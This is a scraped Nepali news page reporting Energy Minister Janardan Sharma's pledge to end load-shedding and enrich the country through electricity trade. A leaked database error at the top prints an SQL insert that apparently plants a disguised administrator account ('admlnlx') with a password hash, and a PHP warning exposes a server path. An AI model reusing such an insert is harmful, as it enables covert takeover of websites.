WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOPF3FVN7ycWw5fpQsBn8GjvaMyf6R.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 00:04:14', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
विद्युत्को व्यापारबाटै देशलाई धनी बनाउनेः ऊर्जामन्त्री – Gaule Khabar

विद्युत्को व्यापारबाटै देशलाई धनी बनाउनेः ऊर्जामन्त्री

विद्युत्को व्यापारबाटै देशलाई धनी बनाउनेः ऊर्जामन्त्री

सिन्धुली, पुस ९  –

ऊर्जामन्त्री जनार्दन शर्माले देशैभर लोडसेडिङमुक्त गराउने गृहकार्यमा सरकार रहेको बताएका छन् ।शनिबार सिन्धुलीको सिन्धुलीमाडीमा प्रेस सेन्टर नेपालले गरेको पत्रकार सम्मेलनमा मन्त्री शर्माले नेपालमा विद्युत्को विकास गरी जनताको आय–आर्जन वृद्धि गराउन सरकारले प्रयास गरिरहेको बताए ।

उनले विद्युत्को व्यापारबाटै मुलुकलाई धनी बनाउने र उत्पादित बिजुलीको वितरण प्रभावकारी बनाइने प्रतिबद्धता व्यक्त गरे ।मन्त्री शर्माले जलासययुक्त आयोजनाको विकास गर्न मन्त्रालयले नयाँ रणनीति बनाउन लागेको जानकारी पनि दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका